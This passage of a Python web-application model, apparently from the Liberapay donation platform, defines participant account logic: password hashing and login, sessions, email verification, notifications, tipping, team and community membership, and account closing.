participants.*::participants\n \"\"\".format(x), vals)\n\n @classmethod\n def make_active(cls, username, kind, password, cursor=None):\n \"\"\"Return a new active participant.\n \"\"\"\n now = utcnow()\n d = {\n 'kind': kind,\n 'status': 'active',\n 'password': cls.hash_password(password),\n 'password_mtime': now,\n 'join_time': now,\n }\n cols, vals = zip(*d.items())\n cols = ', '.join(cols)\n placeholders = ', '.join(['%s']*len(vals))\n with cls.db.get_cursor(cursor) as c:\n p = c.one(\"\"\"\n INSERT INTO participants ({0}) VALUES ({1})\n RETURNING participants.*::participants\n 
\"\"\".format(cols, placeholders), vals)\n p.change_username(username, c)\n return p\n\n def make_team(self, name, email=None):\n with self.db.get_cursor() as c:\n t = c.one(\"\"\"\n INSERT INTO participants\n (kind, status, join_time)\n VALUES ('group', 'active', now())\n RETURNING participants.*::participants\n \"\"\")\n t.change_username(name, c)\n t.add_member(self, c)\n if email:\n t.add_email(email)\n return t\n\n @classmethod\n def from_id(cls, id):\n \"\"\"Return an existing participant based on id.\n \"\"\"\n return cls._from_thing(\"id\", id)\n\n @classmethod\n def from_username(cls, username):\n \"\"\"Return an existing participant based on username.\n \"\"\"\n return cls._from_thing(\"lower(username)\", username.lower())\n\n @classmethod\n def _from_thing(cls, thing, value):\n assert thing in (\"id\", \"lower(username)\", \"mangopay_user_id\", \"email\")\n if thing == 'email':\n # This query looks for an unverified address if the participant\n # doesn't have any verified address\n return cls.db.one(\"\"\"\n SELECT p.*::participants\n FROM emails e\n JOIN participants p ON p.id = e.participant\n WHERE e.address = %s\n AND (p.email IS NULL OR p.email = e.address)\n \"\"\", (value,))\n return cls.db.one(\"\"\"\n SELECT participants.*::participants\n FROM participants\n WHERE {}=%s\n \"\"\".format(thing), (value,))\n\n @classmethod\n def authenticate(cls, k1, k2, v1=None, v2=None):\n assert k1 in ('id', 'username', 'email')\n if not (v1 and v2):\n return\n if k1 == 'username':\n k1 = 'lower(username)'\n v1 = v1.lower()\n p = cls._from_thing(k1, v1)\n if not p:\n return\n if k2 == 'session':\n if not p.session_token:\n return\n if p.session_expires < utcnow():\n return\n if constant_time_compare(p.session_token, v2):\n p.authenticated = True\n return p\n elif k2 == 'password':\n if not p.password:\n return\n algo, rounds, salt, hashed = p.password.split('$', 3)\n rounds = int(rounds)\n salt, hashed = b64decode(salt), b64decode(hashed)\n if cls._hash_password(v2, algo, salt, rounds) == hashed:\n p.authenticated = True\n return p\n\n def refetch(self):\n return self._from_thing('id', self.id)\n\n\n # Password Management\n # ===================\n\n @staticmethod\n def _hash_password(password, algo, salt, rounds):\n return pbkdf2_hmac(algo, password.encode('utf8'), salt, rounds)\n\n @classmethod\n def hash_password(cls, password):\n l = len(password)\n if l < PASSWORD_MIN_SIZE or l > PASSWORD_MAX_SIZE:\n raise BadPasswordSize\n algo = 'sha256'\n salt = urandom(21)\n rounds = website.app_conf.password_rounds\n hashed = cls._hash_password(password, algo, salt, rounds)\n hashed = '$'.join((algo, str(rounds), b64encode(salt), b64encode(hashed)))\n return hashed\n\n def update_password(self, password, cursor=None):\n hashed = self.hash_password(password)\n p_id = self.id\n with self.db.get_cursor(cursor) as c:\n c.run(\"\"\"\n UPDATE participants\n SET password = %(hashed)s\n , password_mtime = CURRENT_TIMESTAMP\n WHERE id = %(p_id)s;\n \"\"\", locals())\n\n\n # Session Management\n # ==================\n\n def update_session(self, new_token, expires):\n \"\"\"Set ``session_token`` and ``session_expires``.\n \"\"\"\n self.db.run(\"\"\"\n UPDATE participants\n SET session_token=%s\n , session_expires=%s\n WHERE id=%s\n \"\"\", (new_token, expires, self.id))\n self.set_attributes(session_token=new_token, session_expires=expires)\n\n def set_session_expires(self, expires):\n \"\"\"Set ``session_expires`` to the given datetime.\n \"\"\"\n self.db.run( \"UPDATE participants SET session_expires=%s 
\"\n \"WHERE id=%s\"\n , (expires, self.id,)\n )\n self.set_attributes(session_expires=expires)\n\n def start_session(self, suffix=''):\n \"\"\"Start a new session for the user, invalidating the previous one.\n \"\"\"\n token = uuid.uuid4().hex + suffix\n expires = utcnow() + SESSION_TIMEOUT\n self.update_session(token, expires)\n\n def sign_in(self, cookies, suffix=''):\n assert self.authenticated\n self.start_session(suffix)\n creds = '%s:%s' % (self.id, self.session_token)\n set_cookie(cookies, SESSION, creds, self.session_expires)\n\n def keep_signed_in(self, cookies):\n \"\"\"Extend the user's current session.\n \"\"\"\n new_expires = utcnow() + SESSION_TIMEOUT\n if new_expires - self.session_expires > SESSION_REFRESH:\n self.set_session_expires(new_expires)\n token = self.session_token\n creds = '%s:%s' % (self.id, token)\n set_cookie(cookies, SESSION, creds, expires=new_expires)\n\n def sign_out(self, cookies):\n \"\"\"End the user's current session.\n \"\"\"\n self.update_session(None, None)\n erase_cookie(cookies, SESSION)\n\n\n # Statement\n # =========\n\n def get_statement(self, langs, type='profile'):\n \"\"\"Get the participant's statement in the language that best matches\n the list provided.\n \"\"\"\n p_id = self.id\n return self.db.one(\"\"\"\n SELECT content, lang\n FROM statements\n JOIN enumerate(%(langs)s) langs ON langs.value = statements.lang\n WHERE participant = %(p_id)s\n AND type = %(type)s\n ORDER BY langs.rank\n LIMIT 1\n \"\"\", locals(), default=(None, None))\n\n def get_statement_langs(self, type='profile'):\n return self.db.all(\"\"\"\n SELECT lang FROM statements WHERE participant=%s AND type=%s\n \"\"\", (self.id, type))\n\n def upsert_statement(self, lang, statement, type='profile'):\n if not statement:\n self.db.run(\"\"\"\n DELETE FROM statements\n WHERE participant=%s\n AND type=%s\n AND lang=%s\n \"\"\", (self.id, type, lang))\n return\n r = self.db.one(\"\"\"\n UPDATE statements\n SET content=%s\n WHERE participant=%s\n AND type=%s\n AND lang=%s\n RETURNING true\n \"\"\", (statement, self.id, type, lang))\n if not r:\n search_conf = i18n.SEARCH_CONFS.get(lang, 'simple')\n try:\n self.db.run(\"\"\"\n INSERT INTO statements\n (lang, content, participant, search_conf, type)\n VALUES (%s, %s, %s, %s, %s)\n \"\"\", (lang, statement, self.id, search_conf, type))\n except IntegrityError:\n return self.upsert_statement(lang, statement)\n\n\n # Pricing\n # =======\n\n @property\n def usage(self):\n return max(self.giving, self.receiving)\n\n @property\n def suggested_payment(self):\n return (self.usage * Decimal('0.05')).quantize(Decimal('.01'))\n\n\n # Stubs\n # =====\n\n def resolve_stub(self):\n rec = self.db.one(\"\"\"\n SELECT platform, user_name\n FROM elsewhere\n WHERE participant = %s\n \"\"\", (self.id,))\n return rec and '/on/%s/%s/' % (rec.platform, rec.user_name)\n\n\n # Closing\n # =======\n\n class AccountNotEmpty(Exception): pass\n\n def final_check(self, cursor):\n \"\"\"Sanity-check that balance and tips have been dealt with.\n \"\"\"\n if self.balance != 0:\n raise self.AccountNotEmpty\n incoming = cursor.one(\"\"\"\n SELECT count(*) FROM current_tips WHERE tippee = %s AND amount > 0\n \"\"\", (self.id,))\n if incoming > 0:\n raise self.AccountNotEmpty\n\n class UnknownDisbursementStrategy(Exception): pass\n\n def close(self, disbursement_strategy):\n \"\"\"Close the participant's account.\n \"\"\"\n with self.db.get_cursor() as cursor:\n if disbursement_strategy == None:\n pass # No balance, supposedly. 
final_check will make sure.\n elif disbursement_strategy == 'downstream':\n # This in particular needs to come before clear_tips_giving.\n self.distribute_balance_as_final_gift(cursor)\n else:\n raise self.UnknownDisbursementStrategy\n\n self.clear_tips_giving(cursor)\n self.clear_tips_receiving(cursor)\n self.clear_takes(cursor)\n if self.kind == 'group':\n self.remove_all_members(cursor)\n self.clear_personal_information(cursor)\n self.final_check(cursor)\n self.update_status('closed', cursor)\n\n class NoOneToGiveFinalGiftTo(Exception): pass\n\n def distribute_balance_as_final_gift(self, cursor):\n \"\"\"Distribute a balance as a final gift.\n \"\"\"\n if self.balance == 0:\n return\n\n tips, total, _, _= self.get_giving_for_profile()\n transfers = []\n distributed = Decimal('0.00')\n\n for tip in tips:\n rate = tip.amount / total\n pro_rated = (self.balance * rate).quantize(Decimal('0.01'), ROUND_DOWN)\n if pro_rated == 0:\n continue\n distributed += pro_rated\n transfers.append([tip.tippee, pro_rated])\n\n if not transfers:\n raise self.NoOneToGiveFinalGiftTo\n\n diff = self.balance - distributed\n if diff != 0:\n transfers[0][1] += diff # Give it to the highest receiver.\n\n from liberapay.billing.exchanges import transfer\n db = self.db\n tipper = self.id\n for tippee, amount in transfers:\n balance = transfer(db, tipper, tippee, amount, 'final-gift',\n tipper_mango_id=self.mangopay_user_id,\n tipper_wallet_id=self.mangopay_wallet_id)\n\n assert balance == 0\n self.set_attributes(balance=balance)\n\n def clear_tips_giving(self, cursor):\n \"\"\"Zero out tips from a given user.\n \"\"\"\n tippees = cursor.all(\"\"\"\n\n SELECT ( SELECT p.*::participants\n FROM participants p\n WHERE p.id=t.tippee\n ) AS tippee\n FROM current_tips t\n WHERE tipper = %s\n AND amount > 0\n\n \"\"\", (self.id,))\n for tippee in tippees:\n self.set_tip_to(tippee, '0.00', update_self=False, cursor=cursor)\n\n def clear_tips_receiving(self, cursor):\n \"\"\"Zero out tips to a given user.\n \"\"\"\n tippers = cursor.all(\"\"\"\n\n SELECT ( SELECT p.*::participants\n FROM participants p\n WHERE p.id=t.tipper\n ) AS tipper\n FROM current_tips t\n WHERE tippee = %s\n AND amount > 0\n\n \"\"\", (self.id,))\n for tipper in tippers:\n tipper.set_tip_to(self, '0.00', update_tippee=False, cursor=cursor)\n\n def clear_takes(self, cursor):\n \"\"\"Leave all teams by zeroing all takes.\n \"\"\"\n teams = cursor.all(\"\"\"\n SELECT p.*::participants\n FROM current_takes x\n JOIN participants p ON p.id = x.team\n WHERE member=%s\n \"\"\", (self.id,))\n for t in teams:\n t.set_take_for(self, None, self, cursor)\n\n def clear_personal_information(self, cursor):\n \"\"\"Clear personal information such as statements and goal.\n \"\"\"\n r = cursor.one(\"\"\"\n\n DELETE FROM community_memberships WHERE participant=%(id)s;\n DELETE FROM community_subscriptions WHERE participant=%(id)s;\n DELETE FROM emails WHERE participant=%(id)s AND address <> %(email)s;\n DELETE FROM statements WHERE participant=%(id)s;\n\n UPDATE participants\n SET goal=NULL\n , avatar_url=NULL\n , session_token=NULL\n , session_expires=now()\n , giving=0\n , receiving=0\n , npatrons=0\n WHERE id=%(id)s\n RETURNING *;\n\n \"\"\", dict(id=self.id, email=self.email))\n self.set_attributes(**r._asdict())\n\n @property\n def closed_time(self):\n return self.db.one(\"\"\"\n SELECT ts\n FROM events\n WHERE participant=%s\n AND type='set_status'\n AND payload='\"closed\"'\n ORDER BY ts DESC\n LIMIT 1\n \"\"\", (str(self.id),))\n\n\n # Emails\n # ======\n\n def 
add_email(self, email, cursor=None):\n \"\"\"\n This is called when\n 1) Adding a new email address\n 2) Resending the verification email for an unverified email address\n\n Returns the number of emails sent.\n \"\"\"\n\n if not EMAIL_RE.match(email):\n raise BadEmailAddress(email)\n\n # Check that this address isn't already verified\n owner = (cursor or self.db).one(\"\"\"\n SELECT participant\n FROM emails\n WHERE address = %(email)s\n AND verified IS true\n \"\"\", locals())\n if owner:\n if owner == self.id:\n return 0\n else:\n raise EmailAlreadyTaken(email)\n\n if len(self.get_emails()) > 9:\n raise TooManyEmailAddresses(email)\n\n nonce = str(uuid.uuid4())\n added_time = utcnow()\n try:\n with self.db.get_cursor(cursor) as c:\n self.add_event(c, 'add_email', email)\n c.run(\"\"\"\n INSERT INTO emails\n (address, nonce, added_time, participant)\n VALUES (%s, %s, %s, %s)\n \"\"\", (email, nonce, added_time, self.id))\n except IntegrityError:\n nonce = (cursor or self.db).one(\"\"\"\n UPDATE emails\n SET added_time=%s\n WHERE participant=%s\n AND address=%s\n AND verified IS NULL\n RETURNING nonce\n \"\"\", (added_time, self.id, email))\n if not nonce:\n return self.add_email(email)\n\n scheme = website.canonical_scheme\n host = website.canonical_host\n username = self.username\n base64_email = b64encode_s(email)\n link = \"{scheme}://{host}/{username}/emails/verify.html?email64={base64_email}&nonce={nonce}\"\n r = self.send_email('verification', email=email, link=link.format(**locals()))\n assert r == 1 # Make sure the verification email was sent\n\n if self.email:\n self.send_email('verification_notice', new_email=email)\n return 2\n else:\n self.update_avatar(cursor=cursor)\n\n return 1\n\n def update_email(self, email):\n if not getattr(self.get_email(email), 'verified', False):\n raise EmailNotVerified(email)\n id = self.id\n with self.db.get_cursor() as c:\n self.add_event(c, 'set_primary_email', email)\n c.run(\"\"\"\n UPDATE participants\n SET email=%(email)s\n WHERE id=%(id)s\n \"\"\", locals())\n self.set_attributes(email=email)\n self.update_avatar()\n\n def verify_email(self, email, nonce):\n if '' in (email, nonce):\n return emails.VERIFICATION_MISSING\n r = self.get_email(email)\n if r is None:\n return emails.VERIFICATION_FAILED\n if r.verified:\n assert r.nonce is None # and therefore, order of conditions matters\n return emails.VERIFICATION_REDUNDANT\n if not constant_time_compare(r.nonce, nonce):\n return emails.VERIFICATION_FAILED\n if (utcnow() - r.added_time) > EMAIL_VERIFICATION_TIMEOUT:\n return emails.VERIFICATION_EXPIRED\n try:\n self.db.run(\"\"\"\n UPDATE emails\n SET verified=true, verified_time=now(), nonce=NULL\n WHERE participant=%s\n AND address=%s\n AND verified IS NULL\n \"\"\", (self.id, email))\n except IntegrityError:\n return emails.VERIFICATION_STYMIED\n\n if not self.email:\n self.update_email(email)\n return emails.VERIFICATION_SUCCEEDED\n\n def get_email(self, email):\n return self.db.one(\"\"\"\n SELECT *\n FROM emails\n WHERE participant=%s\n AND address=%s\n \"\"\", (self.id, email))\n\n def get_emails(self):\n return self.db.all(\"\"\"\n SELECT *\n FROM emails\n WHERE participant=%s\n ORDER BY id\n \"\"\", (self.id,))\n\n def get_any_email(self, cursor=None):\n return (cursor or self.db).one(\"\"\"\n SELECT address\n FROM emails\n WHERE participant=%s\n LIMIT 1\n \"\"\", (self.id,))\n\n def remove_email(self, address):\n if address == self.email:\n raise CannotRemovePrimaryEmail()\n with self.db.get_cursor() as c:\n self.add_event(c, 
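# record the removal in the 'events' audit table\n                           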
'remove_email', address)\n            c.run(\"DELETE FROM emails WHERE participant=%s AND address=%s\",\n                  (self.id, address))\n\n    def send_email(self, spt_name, **context):\n        self.fill_notification_context(context)\n        email = context.setdefault('email', self.email)\n        if not email:\n            return 0 # Not Sent\n        langs = i18n.parse_accept_lang(self.email_lang or 'en')\n        locale = i18n.match_lang(langs)\n        i18n.add_helpers_to_context(context, locale)\n        context['escape'] = lambda s: s\n        context_html = dict(context)\n        i18n.add_helpers_to_context(context_html, locale)\n        context_html['escape'] = htmlescape\n        spt = website.emails[spt_name]\n        base_spt = website.emails['base']\n        def render(t, context):\n            b = base_spt[t].render(context).strip()\n            return b.replace('$body', spt[t].render(context).strip())\n        message = {}\n        message['from_email'] = 'Liberapay Support <support@liberapay.com>'\n        message['to'] = [formataddr((self.username, email))]\n        message['subject'] = spt['subject'].render(context).strip()\n        message['html'] = render('text/html', context_html)\n        message['text'] = render('text/plain', context)\n\n        n = website.mailer.send(**message)\n        website.log_email(message)\n        return n\n\n    def queue_email(self, spt_name, **context):\n        context = serialize(context)\n        self.db.run(\"\"\"\n            INSERT INTO email_queue\n                        (participant, spt_name, context)\n                 VALUES (%s, %s, %s)\n        \"\"\", (self.id, spt_name, context))\n\n    @classmethod\n    def dequeue_emails(cls):\n        fetch_messages = lambda: cls.db.all(\"\"\"\n            SELECT *\n              FROM email_queue\n          ORDER BY id ASC\n             LIMIT 60\n        \"\"\")\n        delete = lambda m: cls.db.run(\n            \"DELETE FROM email_queue WHERE id = %s\", (m.id,)\n        )\n        while True:\n            messages = fetch_messages()\n            if not messages:\n                break\n            for msg in messages:\n                p = cls.from_id(msg.participant)\n                if not p.email:\n                    delete(msg)\n                    continue\n                try:\n                    r = p.send_email(msg.spt_name, **pickle.loads(msg.context))\n                    assert r == 1\n                except Exception as e:\n                    website.tell_sentry(e, {}, allow_reraise=True)\n                else:\n                    delete(msg)\n                sleep(1)\n\n    def set_email_lang(self, accept_lang):\n        if not accept_lang:\n            return\n        self.db.run(\"UPDATE participants SET email_lang=%s WHERE id=%s\",\n                    (accept_lang, self.id))\n        self.set_attributes(email_lang=accept_lang)\n\n\n    # Notifications\n    # =============\n\n    def notify(self, event, force_email=False, web=True, **context):\n        if force_email or self.email_notif_bits & EVENTS.get(event).bit:\n            self.queue_email(event, **context)\n        if web:\n            return self.add_notification(event, **context)\n\n    def add_notification(self, event, **context):\n        p_id = self.id\n        context = serialize(context)\n        n_id = self.db.one(\"\"\"\n            INSERT INTO notification_queue\n                        (participant, event, context)\n                 VALUES (%(p_id)s, %(event)s, %(context)s)\n          RETURNING id;\n        \"\"\", locals())\n        pending_notifs = self.db.one(\"\"\"\n            UPDATE participants\n               SET pending_notifs = pending_notifs + 1\n             WHERE id = %(p_id)s\n         RETURNING pending_notifs;\n        \"\"\", locals())\n        self.set_attributes(pending_notifs=pending_notifs)\n        return n_id\n\n    def mark_notification_as_read(self, n_id):\n        p_id = self.id\n        r = self.db.one(\"\"\"\n            WITH updated AS (\n                UPDATE notification_queue\n                   SET is_new = false\n                 WHERE participant = %(p_id)s\n                   AND id = %(n_id)s\n                   AND is_new\n             RETURNING id\n            )\n            UPDATE participants\n               SET pending_notifs = pending_notifs - (SELECT count(*) FROM updated)\n             WHERE id = %(p_id)s\n         RETURNING pending_notifs;\n        \"\"\", locals())\n        self.set_attributes(pending_notifs=r)\n\n    def mark_notifications_as_read(self, event=None):\n        if not self.pending_notifs:\n            return\n        p_id = self.id\n        sql_filter = 'AND 
event = %(event)s' if event else ''\n r = self.db.one(\"\"\"\n WITH updated AS (\n UPDATE notification_queue\n SET is_new = false\n WHERE participant = %(p_id)s\n AND is_new\n {0}\n RETURNING id\n )\n UPDATE participants\n SET pending_notifs = pending_notifs - (SELECT count(*) FROM updated)\n WHERE id = %(p_id)s\n RETURNING pending_notifs;\n \"\"\".format(sql_filter), locals())\n self.set_attributes(pending_notifs=r)\n\n def remove_notification(self, n_id):\n p_id = self.id\n r = self.db.one(\"\"\"\n WITH deleted AS (\n DELETE FROM notification_queue\n WHERE id = %(n_id)s\n AND participant = %(p_id)s\n RETURNING is_new\n )\n UPDATE participants\n SET pending_notifs = pending_notifs - (\n SELECT count(*) FROM deleted WHERE is_new\n )\n WHERE id = %(p_id)s\n RETURNING pending_notifs;\n \"\"\", locals())\n self.set_attributes(pending_notifs=r)\n\n def fill_notification_context(self, context):\n context.update(aspen_jinja2_renderer.Renderer.global_context)\n context['participant'] = self\n context['username'] = self.username\n context['button_style'] = (\n \"color: #fff; text-decoration:none; display:inline-block; \"\n \"padding: 0 15px; background: #396; white-space: nowrap; \"\n \"font: normal 14px/40px Arial, sans-serif; border-radius: 3px\"\n )\n\n def render_notifications(self, state):\n r = []\n notifs = self.db.all(\"\"\"\n SELECT id, event, context, is_new\n FROM notification_queue\n WHERE participant = %s\n ORDER BY is_new DESC, id DESC\n \"\"\", (self.id,))\n for id, event, notif_context, is_new in notifs:\n try:\n notif_context = pickle.loads(notif_context)\n context = dict(state)\n self.fill_notification_context(context)\n context.update(notif_context)\n spt = website.emails[event]\n html = spt['text/html'].render(context).strip()\n typ = notif_context.get('type', 'info')\n r.append(dict(id=id, html=html, type=typ, is_new=is_new))\n except Exception as e:\n website.tell_sentry(e, state, allow_reraise=True)\n return r\n\n def notify_patrons(self, elsewhere, tips):\n for t in tips:\n Participant.from_id(t.tipper).notify(\n 'pledgee_joined',\n user_name=elsewhere.user_name,\n platform=elsewhere.platform_data.display_name,\n amount=t.amount,\n profile_url=elsewhere.liberapay_url,\n )\n\n\n # Exchange-related stuff\n # ======================\n\n def get_bank_account_error(self):\n return getattr(ExchangeRoute.from_network(self, 'mango-ba'), 'error', None)\n\n def get_credit_card_error(self):\n return getattr(ExchangeRoute.from_network(self, 'mango-cc'), 'error', None)\n\n @property\n def withdrawable_balance(self):\n from liberapay.billing.exchanges import QUARANTINE\n return self.db.one(\"\"\"\n SELECT COALESCE(sum(amount), 0)\n FROM cash_bundles\n WHERE owner = %s\n AND ts < now() - INTERVAL %s\n \"\"\", (self.id, QUARANTINE))\n\n\n # Random Stuff\n # ============\n\n def add_event(self, c, type, payload, recorder=None):\n c.run(\"\"\"\n INSERT INTO events (participant, type, payload, recorder)\n VALUES (%s, %s, %s, %s)\n \"\"\", (self.id, type, Json(payload), recorder))\n\n def url(self, path='', query=''):\n scheme = website.canonical_scheme\n host = website.canonical_host\n username = self.username\n if query:\n assert '?' not in path\n query = '?' 
+ urlencode(query)\n return '{scheme}://{host}/{username}/{path}{query}'.format(**locals())\n\n def get_teams(self):\n \"\"\"Return a list of teams this user is a member of.\n \"\"\"\n return self.db.all(\"\"\"\n\n SELECT team AS id\n , p.username AS name\n , ( SELECT count(*)\n FROM current_takes\n WHERE team=x.team\n ) AS nmembers\n FROM current_takes x\n JOIN participants p ON p.id = x.team\n WHERE member=%s;\n\n \"\"\", (self.id,))\n\n @property\n def accepts_tips(self):\n return (self.goal is None) or (self.goal >= 0)\n\n\n # Communities\n # ===========\n\n def create_community(self, name, **kw):\n return Community.create(name, self.id, **kw)\n\n def update_community_status(self, table, on, c_id):\n assert table in ('memberships', 'subscriptions')\n p_id = self.id\n self.db.run(\"\"\"\n DO $$\n DECLARE\n cname text;\n BEGIN\n BEGIN\n INSERT INTO community_{0}\n (community, participant, is_on)\n VALUES (%(c_id)s, %(p_id)s, %(on)s);\n IF (FOUND) THEN RETURN; END IF;\n EXCEPTION WHEN unique_violation THEN\n GET STACKED DIAGNOSTICS cname = CONSTRAINT_NAME;\n IF (cname <> 'community_{0}_participant_community_key') THEN\n RAISE;\n END IF;\n END;\n UPDATE community_{0}\n SET is_on = %(on)s\n , mtime = CURRENT_TIMESTAMP\n WHERE community = %(c_id)s\n AND participant = %(p_id)s;\n IF (NOT FOUND) THEN\n RAISE 'upsert in community_{0} failed';\n END IF;\n END;\n $$ LANGUAGE plpgsql;\n \"\"\".format(table), locals())\n\n\n def get_communities(self):\n return self.db.all(\"\"\"\n SELECT c.*, replace(c.name, '_', ' ') AS pretty_name\n FROM community_memberships cm\n JOIN communities c ON c.id = cm.community\n WHERE cm.is_on AND cm.participant = %s\n ORDER BY c.nmembers ASC, c.name\n \"\"\", (self.id,))\n\n\n # More Random Stuff\n # =================\n\n def change_username(self, suggested, cursor=None):\n suggested = suggested and suggested.strip()\n\n if not suggested:\n raise UsernameIsEmpty(suggested)\n\n if len(suggested) > USERNAME_MAX_SIZE:\n raise UsernameTooLong(suggested)\n\n if set(suggested) - ASCII_ALLOWED_IN_USERNAME:\n raise UsernameContainsInvalidCharacters(suggested)\n\n lowercased = suggested.lower()\n\n if lowercased in website.restricted_usernames:\n raise UsernameIsRestricted(suggested)\n\n if suggested != self.username:\n with self.db.get_cursor(cursor) as c:\n try:\n # Will raise IntegrityError if the desired username is taken.\n actual = c.one(\"\"\"\n UPDATE participants\n SET username=%s\n WHERE id=%s\n RETURNING username, lower(username)\n \"\"\", (suggested, self.id))\n except IntegrityError:\n raise UsernameAlreadyTaken(suggested)\n\n self.add_event(c, 'set_username', suggested)\n assert (suggested, lowercased) == actual # sanity check\n self.set_attributes(username=suggested)\n\n return suggested\n\n def update_avatar(self, src=None, cursor=None):\n if self.status == 'stub':\n assert src is None\n\n platform, key = src.split(':', 1) if src else (None, None)\n email = self.avatar_email or self.email or self.get_any_email(cursor)\n\n if platform == 'libravatar' or platform is None and email:\n if not email:\n return\n avatar_id = md5(email.strip().lower()).hexdigest()\n avatar_url = 'https://seccdn.libravatar.org/avatar/'+avatar_id\n avatar_url += AVATAR_QUERY\n\n elif platform is None:\n avatar_url = (cursor or self.db).one(\"\"\"\n SELECT avatar_url\n FROM elsewhere\n WHERE participant = %s\n ORDER BY platform = 'github' DESC,\n avatar_url LIKE '%%libravatar.org%%' DESC,\n avatar_url LIKE '%%gravatar.com%%' DESC\n LIMIT 1\n \"\"\", (self.id,))\n\n else:\n avatar_url = 
(cursor or self.db).one(\"\"\"\n SELECT avatar_url\n FROM elsewhere\n WHERE participant = %s\n AND platform = %s\n -- AND user_id = %%s -- not implemented yet\n \"\"\", (self.id, platform))\n\n if not avatar_url:\n return\n\n (cursor or self.db).run(\"\"\"\n UPDATE participants\n SET avatar_url = %s\n , avatar_src = %s\n WHERE id = %s\n \"\"\", (avatar_url, src, self.id))\n self.set_attributes(avatar_src=src, avatar_url=avatar_url)\n\n return avatar_url\n\n def update_goal(self, goal, cursor=None):\n with self.db.get_cursor(cursor) as c:\n json = None if goal is None else str(goal)\n self.add_event(c, 'set_goal', json)\n c.run(\"UPDATE participants SET goal=%s WHERE id=%s\", (goal, self.id))\n self.set_attributes(goal=goal)\n if not self.accepts_tips:\n self.clear_tips_receiving(c)\n self.update_receiving(c)\n\n def update_status(self, status, cursor=None):\n with self.db.get_cursor(cursor) as c:\n goal = 'goal'\n if status == 'closed':\n goal = '-1'\n elif status == 'active':\n goal = 'NULL'\n r = c.one(\"\"\"\n UPDATE participants\n SET status = %(status)s\n , join_time = COALESCE(join_time, CURRENT_TIMESTAMP)\n , goal = {0}\n WHERE id=%(id)s\n RETURNING status, join_time, goal\n \"\"\".format(goal), dict(id=self.id, status=status))\n self.set_attributes(**r._asdict())\n self.add_event(c, 'set_status', status)\n if not self.accepts_tips:\n self.clear_tips_receiving(c)\n self.update_receiving(c)\n\n def update_giving_and_tippees(self, cursor):\n updated_tips = self.update_giving(cursor)\n for tip in updated_tips:\n Participant.from_id(tip.tippee).update_receiving(cursor)\n\n def update_giving(self, cursor=None):\n # Update is_funded on tips\n tips = (cursor or self.db).all(\"\"\"\n SELECT t.*\n FROM current_tips t\n JOIN participants p2 ON p2.id = t.tippee\n WHERE t.tipper = %s\n AND t.amount > 0\n ORDER BY p2.join_time IS NULL, t.ctime ASC\n \"\"\", (self.id,))\n fake_balance = self.balance + self.receiving\n updated = []\n for tip in tips:\n if tip.amount > fake_balance:\n is_funded = False\n else:\n fake_balance -= tip.amount\n is_funded = True\n if tip.is_funded == is_funded:\n continue\n updated.append((cursor or self.db).one(\"\"\"\n UPDATE tips\n SET is_funded = %s\n WHERE id = %s\n RETURNING *\n \"\"\", (is_funded, tip.id)))\n\n # Update giving on participant\n giving = (cursor or self.db).one(\"\"\"\n UPDATE participants p\n SET giving = COALESCE((\n SELECT sum(amount)\n FROM current_tips\n JOIN participants p2 ON p2.id = tippee\n WHERE tipper = %(id)s\n AND p2.status = 'active'\n AND (p2.mangopay_user_id IS NOT NULL OR kind = 'group')\n AND amount > 0\n AND is_funded\n ), 0)\n WHERE p.id = %(id)s\n RETURNING giving\n \"\"\", dict(id=self.id))\n self.set_attributes(giving=giving)\n\n return updated\n\n def update_receiving(self, cursor=None):\n if self.kind == 'group':\n old_takes = self.compute_actual_takes(cursor=cursor)\n r = (cursor or self.db).one(\"\"\"\n WITH our_tips AS (\n SELECT amount\n FROM current_tips\n WHERE tippee = %(id)s\n AND amount > 0\n AND is_funded\n )\n UPDATE participants p\n SET receiving = (COALESCE((\n SELECT sum(amount)\n FROM our_tips\n ), 0) + taking)\n , npatrons = COALESCE((SELECT count(*) FROM our_tips), 0)\n WHERE p.id = %(id)s\n RETURNING receiving, npatrons\n \"\"\", dict(id=self.id))\n self.set_attributes(receiving=r.receiving, npatrons=r.npatrons)\n if self.kind == 'group':\n new_takes = self.compute_actual_takes(cursor=cursor)\n self.update_taking(old_takes, new_takes, cursor=cursor)\n\n\n def set_tip_to(self, tippee, amount, 
update_self=True, update_tippee=True, cursor=None):\n \"\"\"Given a Participant or username, and amount as str, returns a dict.\n\n We INSERT instead of UPDATE, so that we have history to explore. The\n COALESCE function returns the first of its arguments that is not NULL.\n The effect here is to stamp all tips with the timestamp of the first\n tip from this user to that. I believe this is used to determine the\n order of transfers during payday.\n\n The dict returned represents the row inserted in the tips table, with\n an additional boolean indicating whether this is the first time this\n tipper has tipped (we want to track that as part of our conversion\n funnel).\n\n \"\"\"\n assert self.status == 'active' # sanity check\n\n if isinstance(tippee, AccountElsewhere):\n tippee = tippee.participant\n elif not isinstance(tippee, Participant):\n tippee, u = Participant.from_username(tippee), tippee\n if not tippee:\n raise NoTippee(u)\n\n if self.id == tippee.id:\n raise NoSelfTipping\n\n amount = Decimal(amount) # May raise InvalidOperation\n if amount != 0 and amount < MIN_TIP or amount > MAX_TIP:\n raise BadAmount(amount)\n\n if not tippee.accepts_tips and amount != 0:\n raise UserDoesntAcceptTips(tippee.username)\n\n # Insert tip\n NEW_TIP = \"\"\"\\\n\n INSERT INTO tips\n (ctime, tipper, tippee, amount)\n VALUES ( COALESCE (( SELECT ctime\n FROM tips\n WHERE (tipper=%(tipper)s AND tippee=%(tippee)s)\n LIMIT 1\n ), CURRENT_TIMESTAMP)\n , %(tipper)s, %(tippee)s, %(amount)s\n )\n RETURNING *\n , ( SELECT count(*) = 0 FROM tips WHERE tipper=%(tipper)s ) AS first_time_tipper\n , ( SELECT join_time IS NULL FROM participants WHERE id = %(tippee)s ) AS is_pledge\n\n \"\"\"\n args = dict(tipper=self.id, tippee=tippee.id, amount=amount)\n t = (cursor or self.db).one(NEW_TIP, args)._asdict()\n\n if update_self:\n # Update giving amount of tipper\n updated = self.update_giving(cursor)\n for u in updated:\n if u.id == t['id']:\n t['is_funded'] = u.is_funded\n if update_tippee:\n # Update receiving amount of tippee\n tippee.update_receiving(cursor)\n\n return t\n\n\n @staticmethod\n def _zero_tip_dict(tippee):\n if isinstance(tippee, Participant):\n tippee = tippee.id\n return dict(amount=Decimal('0.00'), is_funded=False, tippee=tippee)\n\n\n def get_tip_to(self, tippee):\n \"\"\"Given a participant (or their id), returns a dict.\n \"\"\"\n default = self._zero_tip_dict(tippee)\n tippee = default['tippee']\n if self.id == tippee:\n return default\n return self.db.one(\"\"\"\\\n\n SELECT *\n FROM tips\n WHERE tipper=%s\n AND 